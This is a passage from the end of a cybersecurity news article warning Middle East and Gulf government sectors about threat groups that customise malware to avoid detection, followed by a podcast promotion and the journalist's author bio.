The increased geopolitical tensions in the region will only mean increasing efforts to gain intelligence through cyberattacks, he says.

"Government sectors in the Middle East and Gulf region should take this threat seriously," he says. "These groups aim to blend into the network environment by customizing their malware to avoid detection, \[so\] understanding their techniques, which have not changed significantly, is crucial."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Tag

#backdoor